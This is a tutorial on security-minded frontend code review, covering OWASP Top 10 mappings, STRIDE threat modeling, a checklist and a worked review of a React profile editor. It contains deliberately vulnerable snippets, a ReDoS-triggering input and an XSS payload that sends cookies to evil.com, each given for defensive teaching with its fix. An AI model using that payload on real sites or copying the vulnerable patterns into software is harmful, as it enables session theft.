Security Review Mindset
Stop Reviewing for Correctness, Start Reviewing for Exploitability
Most code reviews ask: "Does this code do what it's supposed to?" A security review asks a different question: "What can this code be made to do that it's not supposed to?"
That shift — from correctness to exploitability — is the entire security review mindset. You're not looking for bugs. You're looking for features that an attacker would love. Every input that's read, every output that's rendered, every trust boundary that's crossed is a potential attack surface.
The best security reviewers aren't the ones who know the most CVEs. They're the ones who instinctively ask "what if this value is something I don't expect?" at every data boundary in the code.
Think of code review like inspecting a house you're about to buy. A normal inspector checks that the plumbing works, the roof doesn't leak, the foundation is solid. A security inspector thinks like a burglar: "Can I pick this lock? Is this window accessible from the alley? Does the alarm have a bypass? What if I cut the power?" You're not there to verify the house works — you're there to find every way someone could break in. Both perspectives are necessary, but most developers only do the first.
The Three Questions for Every Code Change
Before diving into specific patterns, train yourself to ask these three questions about every piece of code you review:
1. Where Does User Input Enter?
"User input" is broader than form fields. It includes:
- URL parameters and path segments
- Request headers (including cookies,
Origin,Referer) postMessageevent data- Clipboard paste content
- File uploads (name, type, content)
- Third-party API responses (treat them as untrusted)
- URL hash fragments
localStorage/sessionStorage(can be written by XSS and then read "legitimately")
2. Where Does Output Leave?
Every output is an injection opportunity:
innerHTML,outerHTML,insertAdjacentHTML→ XSShref,src,actionattributes → URL injection / open redirecteval,Function(),setTimeout(string)→ code executiondocument.cookie→ session manipulationpostMessage→ cross-origin data leakagefetch/XMLHttpRequestURLs → SSRF (on server) / data exfiltration- CSS property values → CSS injection
- Log messages → log injection / log forging
3. What Trust Boundaries Are Crossed?
A trust boundary is where data moves between components with different trust levels:
- Client to server (never trust client data on the server)
- Server to client (server data rendered in HTML must be escaped)
- First-party to third-party (API responses, SDKs, iframes)
- User input to DOM (any user-controlled value rendered in the page)
- Parent window to child iframe (postMessage, URL parameters)
Frontend-Specific OWASP Top 10 (2021)
The OWASP Top 10 (latest version: 2021) maps directly to frontend vulnerabilities. Here's how each category applies.
A01:2021 Broken Access Control
Frontend impact: Client-side route guards that don't have server-side enforcement. Hiding UI elements instead of enforcing permissions server-side.
// VULNERABLE: permission check only on the frontend
if (user.role === 'admin') {
showAdminPanel()
}
// Attacker opens DevTools, sets user.role = 'admin', or calls the API directly
// SECURE: server validates permissions on every request
// The frontend hides/shows UI for UX, not for security
A02:2021 Cryptographic Failures
Frontend impact: Storing tokens in localStorage, transmitting sensitive data without HTTPS, using Math.random() for security-sensitive values (nonces, tokens).
// VULNERABLE: Math.random is not cryptographically secure
const nonce = Math.random().toString(36)
// SECURE: use the Web Crypto API
const array = new Uint8Array(32)
crypto.getRandomValues(array)
const nonce = btoa(String.fromCharCode(...array))
A03:2021 Injection
Frontend impact: DOM XSS (innerHTML, eval), template injection (React dangerouslySetInnerHTML, Vue v-html), CSS injection, open redirects via window.location, prototype pollution.
A04:2021 Insecure Design
Frontend impact: Missing rate limiting on client-initiated actions, lack of threat modeling for user flows, no abuse-case consideration during design.
A05:2021 Security Misconfiguration
Frontend impact: Missing security headers (CSP, X-Frame-Options, Strict-Transport-Security), exposed source maps in production, debug mode left enabled, verbose error messages.
A06:2021 Vulnerable and Outdated Components
Frontend impact: Outdated npm packages with known CVEs, unused dependencies that still ship to production, polyfills for browsers you no longer support.
A07:2021 Identification and Authentication Failures
Frontend impact: JWTs in localStorage, missing CSRF protection, weak session management, no refresh token rotation, overly permissive CORS.
A08:2021 Software and Data Integrity Failures
Frontend impact: Loading scripts from CDNs without SRI, CI/CD pipelines without artifact verification, auto-updating dependencies without review, npm supply chain attacks, lockfile poisoning, typosquatting packages.
A09:2021 Security Logging and Monitoring Failures
Frontend impact: No CSP violation reporting, no client-side error monitoring, no tracking of failed authentication attempts, browser console errors swallowed silently.
A10:2021 Server-Side Request Forgery (SSRF)
Frontend impact: Server-side rendering that fetches user-controlled URLs, API routes that proxy requests to user-supplied endpoints, image optimization endpoints that accept arbitrary URLs.
Threat Modeling for Frontend Applications
Threat modeling is the structured process of identifying threats before they become vulnerabilities. For frontend applications, use this simplified framework.
Step 1: Draw the Data Flow
Map every data flow in your application:
User Input → Browser → Your Server → Database
↑↓
Third-Party APIs
↑↓
CDN / Static Assets
↑↓
Embedded Iframes
Step 2: Identify Assets
What's valuable to an attacker?
- User session tokens / auth state
- Personal data (email, name, payment info)
- Application state that grants privileges
- API keys or secrets exposed to the client
- User-generated content that could be weaponized
Step 3: Apply STRIDE at Each Boundary
| Threat | Frontend Example |
|---|---|
| Spoofing | Forging the Origin header, session hijacking |
| Tampering | Modifying localStorage, prototype pollution, DOM manipulation |
| Repudiation | Actions without audit trails, unsigned client-side logs |
| Information disclosure | Source maps in production, verbose errors, JWT payload exposure |
| Denial of service | Regex DoS (ReDoS), infinite loops from user input, memory exhaustion |
| Elevation of privilege | Client-side role checks, DOM clobbering globals, XSS to admin actions |
Step 4: Prioritize by Impact and Likelihood
Not all threats are equal. An XSS in the login page is critical. A CSS injection in a static about page is low priority. Focus review effort on:
- Authentication and session management code
- Payment and financial operations
- Admin/privileged functionality
- User-generated content rendering
- Third-party integrations
ReDoS: The regex denial of service you forgot about
Regular expressions with certain patterns can take exponential time on crafted input. If your frontend validates user input with regex, an attacker can craft a string that freezes the browser tab:
// VULNERABLE: catastrophic backtracking
const emailRegex = /^([a-zA-Z0-9]+\.)*[a-zA-Z0-9]+@([a-zA-Z0-9]+\.)*[a-zA-Z0-9]+$/
// Malicious input that triggers exponential backtracking:
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaa!'
// The regex tries every possible way to split the 'a's across the groups
// before concluding the '!' doesn't match — this takes minutesPrevention: use linear-time regex engines (RE2), limit input length before regex evaluation, or use the URL/Email built-in validators instead of custom regex.
The Security Review Checklist
Use this checklist for every PR that handles user input, authentication, or cross-origin communication.
Input Handling
- Every user input is validated (type, length, format) before use
- No raw user input in
innerHTML,outerHTML, orinsertAdjacentHTML - No user input in
eval,Function(), orsetTimeout/setIntervalwith strings - URL inputs validated for scheme (only
https:andhttp:) before use inhref,src, orwindow.location - JSON input parsed with try/catch and validated against a schema
Authentication & Session
- Auth tokens not stored in localStorage or sessionStorage
- Cookies use HttpOnly, Secure, SameSite, and restricted Path
- CSRF protection on all state-changing requests
- Logout actually invalidates the session server-side
Headers & Configuration
- CSP deployed with nonce-based script-src and strict-dynamic
-
object-src 'none'andbase-uri 'self'in CSP -
frame-ancestorsset (does not fall back to default-src) -
Strict-Transport-Securitywith long max-age - Source maps disabled in production builds
Third-Party Code
- New dependencies audited (downloads, maintainers, install scripts)
- Lockfile changes reviewed for unexpected registry URLs or hash changes
- External scripts have SRI integrity attributes
-
postMessagehandlers validateevent.origin
Data Exposure
- No secrets, API keys, or tokens in client-side bundles
- Error messages don't expose stack traces or internal paths
- JWT payloads don't contain sensitive data (they're base64, not encrypted)
- Console.log statements removed from production code
Production Scenario: Reviewing a Feature PR
Let's walk through how a security-focused engineer reviews a PR that adds user profile editing.
function ProfileEditor({ user }) {
const [bio, setBio] = useState(user.bio)
async function handleSave() {
await fetch('/api/profile', {
method: 'PUT',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ bio }),
})
}
return (
<div>
<textarea
value={bio}
onChange={(e) => setBio(e.target.value)}
maxLength={500}
/>
<button onClick={handleSave}>Save</button>
<div dangerouslySetInnerHTML={{ __html: bio }} />
</div>
)
}
Security review findings:
-
XSS via dangerouslySetInnerHTML: The
biois user-controlled and rendered as raw HTML. An attacker sets their bio to<img src=x onerror="fetch('https://evil.com?c='+document.cookie)">— every visitor to their profile gets XSS'd. Fix: Use{bio}(escaped by React) or sanitize with DOMPurify. -
Client-side length validation only:
maxLength={500}on the textarea is a UX hint, not security. An attacker can send any length via the fetch call directly. Fix: Server-side validation is the enforcement point. -
No CSRF protection: The PUT request uses JSON, which triggers a preflight (good), but if CORS is misconfigured on the server, CSRF is possible. Fix: Verify CORS config rejects unexpected origins.
-
Missing authentication check: The fetch call doesn't include credentials or auth headers. If using cookie-based auth, add
credentials: 'include'. If using tokens, add the Authorization header. Fix: Ensure the request is authenticated. -
No error handling: If the save fails, the user sees no feedback and may retry, potentially sending the same mutation multiple times. Fix: Handle errors and show user feedback.
| What developers do | What they should do |
|---|---|
| Only looking for dangerous function names like eval and innerHTML during security review Searching for function names catches surface-level issues but misses indirect data flows where user input reaches a dangerous sink through several transformations. Data flow tracing catches both direct and indirect injection paths. | Tracing complete data flows from input sources to output sinks, checking validation at each boundary |
| Treating client-side validation as a security control Any client-side check can be bypassed by opening DevTools, modifying the request, or calling the API directly. Client-side validation makes the form user-friendly. Server-side validation makes it secure. Both are needed, but only the server-side check is a security control. | Understanding that client-side validation is UX only — all security enforcement must happen server-side |
| Assuming a framework's default escaping covers all XSS vectors Frameworks escape text interpolation by default, which prevents the most common XSS patterns. But they provide escape hatches for rendering raw HTML, and they don't sanitize URL attributes like href. Each escape hatch is an unguarded injection sink that needs explicit review. | Auditing every escape hatch (dangerouslySetInnerHTML, v-html, href attributes, bypassSecurityTrust) |
Challenge: Security Code Review
Try to solve it before peeking at the answer.
app.get('/search', (req, res) => {
const query = req.query.q
const results = searchDatabase(query)
// Template literal builds HTML with user input:
// <h1>Results for: [query]</h1>
// <ul>[results mapped to <li> tags]</ul>
// <script>window.searchQuery = "[query]"</script>
res.send(buildSearchPage(query, results))
})
- 1Ask 'what if this value is something unexpected' at every data boundary — think like an attacker, not a developer
- 2Trace data flow from input sources to output sinks — missing validation at any step is a vulnerability
- 3Client-side validation is UX, not security — all enforcement must happen server-side
- 4Every dangerouslySetInnerHTML, v-html, innerHTML, and href attribute is a potential injection sink that needs explicit review
- 5Apply the STRIDE model at each trust boundary: Spoofing, Tampering, Repudiation, Information disclosure, DoS, Elevation of privilege
- 6The OWASP Top 10 2021 A08 covers software and data integrity failures including supply chain risks — review dependencies and integrity in every PR